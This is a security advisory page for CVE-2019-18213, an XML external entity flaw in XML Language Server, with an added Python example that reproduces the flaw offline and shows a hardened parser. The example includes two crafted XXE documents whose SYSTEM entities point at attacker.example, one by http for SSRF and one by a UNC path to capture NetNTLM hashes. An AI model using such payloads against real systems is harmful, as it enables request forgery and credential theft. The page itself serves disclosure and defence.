PT-2019-15280 · Red Hat · Xml Language Server+1

Published

2019-10-23

·

Updated

2021-07-21

·

CVE-2019-18213

CVSS v3.1

8.8

High

Vector

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions

XML Language Server versions prior to 0.9.1
Red Hat XML Language Support versions prior to 0.9.1

Description

The XML parser used by the language server resolves external entities declared in a crafted XML document (XXE, XML External Entity injection). A document that declares an entity with a SYSTEM identifier pointing at an attacker-chosen URL makes the language server fetch that URL with the privileges and network position of the user running the editor, which is a Server-Side Request Forgery (SSRF). When the identifier is a UNC path, a Windows host initiates an SMB connection to the attacker's server and authenticates with the user's NetNTLM challenge/response, which can be captured and cracked offline. The victim only has to open the crafted document in an editor that uses the language server.

Recommendations

For XML Language Server versions prior to 0.9.1, update to version 0.9.1 or later. For Red Hat XML Language Support versions prior to 0.9.1, update to version 0.9.1 or later. Until the update is applied, do not open untrusted XML files with the language server enabled.
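The following is an added example written for this page; it is not code from XML Language Server, from Red Hat, or from the advisory. It reproduces the XXE path described above offline with Python's stdlib SAX parser and puts a hardened configuration beside it. The host name attacker.example, both XXE documents, the benign document and the in-memory "remote" response are constructed for illustration. Note that the stdlib has resolved external general entities only on request since Python 3.7.1, so the vulnerable side switches that feature on explicitly; a language server that leaves the equivalent feature on behaves the same way.

```python
# Added example (not code from the project or the advisory): the XXE path
# reproduced offline with xml.sax, next to a hardened parser that refuses it.
# Assumptions: attacker.example, both documents and the "remote" reply are
# constructed; nothing here is taken from the vulnerable software.
import io
import xml.sax
from xml.sax import handler, xmlreader

# Constructed documents. A language server that resolves external general
# entities opens the SYSTEM URL as soon as the file is parsed: an http:// URL
# is a blind SSRF, a UNC-style file URL makes a Windows host start an SMB
# session that can leak its NetNTLM challenge/response.
XXE_HTTP = b"""<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://attacker.example/collect">
]>
<root>&xxe;</root>"""

XXE_SMB = b"""<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:////attacker.example/share/x.dtd">
]>
<root>&xxe;</root>"""

BENIGN = b"<root><child/></root>"


class Collector(handler.ContentHandler):
    """Records the element names the parser reports, in document order."""

    def __init__(self):
        super().__init__()
        self.elements = []

    def startElement(self, name, attrs):
        self.elements.append(name)


class RecordingResolver(handler.EntityResolver):
    """Stands in for the network: notes every external system ID the parser
    wants to fetch and answers from memory, so nothing leaves the machine.
    The stdlib default resolver would instead urlopen() the attacker's URL."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = xmlreader.InputSource(systemId)
        src.setByteStream(io.BytesIO(b"<fetched/>"))  # constructed reply
        return src


class RejectDoctype:
    """Lexical handler that aborts the parse at the first <!DOCTYPE>, the
    only place an entity declaration can come from."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE is not allowed: %r" % name)

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def parse_document(doc, hardened):
    """Parse doc; return (element names seen, external URLs the parser asked for).

    hardened=False mirrors the vulnerable behaviour: external general entities
    are resolved.  hardened=True keeps them off and rejects any DOCTYPE before
    an entity can even be declared."""
    parser = xml.sax.make_parser()
    collector, resolver = Collector(), RecordingResolver()
    parser.setContentHandler(collector)
    parser.setEntityResolver(resolver)
    if hardened:
        parser.setFeature(handler.feature_external_ges, False)
        parser.setFeature(handler.feature_external_pes, False)
        parser.setProperty(handler.property_lexical_handler, RejectDoctype())
    else:
        parser.setFeature(handler.feature_external_ges, True)
    src = xmlreader.InputSource()
    src.setByteStream(io.BytesIO(doc))
    parser.parse(src)
    return collector.elements, resolver.requested


def is_rejected(doc):
    """True when the hardened parser refuses doc outright."""
    try:
        parse_document(doc, hardened=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, doc in (("http", XXE_HTTP), ("smb", XXE_SMB)):
        elements, urls = parse_document(doc, hardened=False)
        print(label, "vulnerable parser fetched:", urls, "elements:", elements)
        print(label, "hardened parser rejects:", is_rejected(doc))
    print("benign:", parse_document(BENIGN, hardened=True))
```

The vulnerable run shows the two things the advisory describes: the URL chosen by the document author is requested (the SSRF, or the SMB session for the UNC form), and whatever comes back is spliced into the parsed document. The hardened run never reaches the entity: the DOCTYPE is refused first, and external entity resolution stays off as a second layer in case a parser path still accepts a DTD. In Java/Xerces parsers the corresponding controls are the SAX feature http://xml.org/sax/features/external-general-entities set to false and http://apache.org/xml/features/disallow-doctype-decl set to true; the advisory does not describe the project's actual 0.9.1 change, so verify the shipped fix rather than assuming it matches this example.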

Exploit

Fix

XXE


Weakness Enumeration

Related Identifiers

CVE-2019-18213

Affected Products

Red Hat Xml Language Support
Xml Language Server